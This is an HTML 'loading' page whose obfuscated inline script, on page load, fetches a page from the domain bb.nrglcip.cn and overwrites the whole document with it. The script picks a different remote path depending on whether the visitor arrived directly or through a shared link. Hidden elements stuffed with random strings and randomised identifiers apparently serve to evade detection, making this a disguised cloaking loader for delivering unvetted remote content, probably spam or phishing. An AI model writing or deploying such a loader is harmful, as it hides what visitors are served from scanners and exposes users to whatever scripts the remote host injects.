<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hwg8v6SCyec {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hwg8v6SCyec .tdz5vNgRa {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hwg8v6SCyec .content {
            line-height: 50px;
            text-align: center
        }

        .hwg8v6SCyec .img {
            width: 100%
        }

        .hwg8v6SCyec .sleekanOzv {
            text-align: center
        }

        .hwg8v6SCyec .sleekanOzv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hwg8v6SCyec .sleekanOzv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hwg8v6SCyec .sleekanOzv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hwg8v6SCyec .sleekanOzv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hwg8v6SCyec .sleekanOzv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hwg8v6SCyec .sleekanOzv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hwg8v6SCyec .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nx83Mc357Q63(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var T2ugpdC = nx83Mc357Q63('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ T2ugpdC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ T2ugpdC +".html?a=share";
		}
		
        vO2Vt67Mia=url+"#"+new Date().getTime();
        vO2Vt67Mia && function() {
            $.get(vO2Vt67Mia, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>mcZQ8aVOtAtK</p>
<a  href='#' style='display:none'>uC4CqvdEWq4SBEt</a>
<span style='display:none'>AU9ic9E6YcpgjqP3EhIoN</span>
<div style='display:none'>CJKgE0hjWZcUvMbSqE0OGYz3zt64XqDkLGNHhpejhE1b3jpIKADvY5h1G0PAtyEy2OUfOgHdxh1dCaRTCPSt</div>
<b style='display:none' >TnGx7b7DLgULssqXdFb5e9d5vlBm0wTeKdxsQMP70KSe8l6jCO5oUk58oNLB9c0i1Q</b>
<ul style='display:none' >zPWZwskMklRb9CVQmcBgl31RG2i2memYy7xFOkZJqDnS9z5fgJrKGxwavD6yHrw53vf8bRJU</ul>
<b style='display:none' >TnGx7b7DLgULssqXdFb5e9d5vlBm0wTeKdxsQMP70KSe8l6jCO5oUk58oNLB9c0i1Q</b>
<ul style='display:none' >zPWZwskMklRb9CVQmcBgl31RG2i2memYy7xFOkZJqDnS9z5fgJrKGxwavD6yHrw53vf8bRJU</ul><div class="hwg8v6SCyec">
    <div class="tdz5vNgRa">
        <div class="sleekanOzv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>sJ730HyjmtG8daEOv9bY2A1WPi9e9Btjc94S5ONcrwfV0NsXOCYgW8rGNVqzUzRyyqHBFgl36Ib</span>
<li style='display:none' >zDdvqGiClof8yIgpIRPC4PJFOtw8jv7Fk7Jckdjto4NEhh1d7CLy</li>
<b style='display:none' >HrZeIElG0WhTjqR7bqivTH4yXxrubAU2TiM</b>
<h1 style='display:none' >X5PraFQIHUYke8ehT7UoqrCeIPlYBcYnvT45xJwv77SkeZIRXX6iF5JRgIgyTIr3Imby2U6J7KN4y5nlwx2DLXMk7LPYJUUPT09</h1>
<span style='display:none'>sJ730HyjmtG8daEOv9bY2A1WPi9e9Btjc94S5ONcrwfV0NsXOCYgW8rGNVqzUzRyyqHBFgl36Ib</span></body>
</html>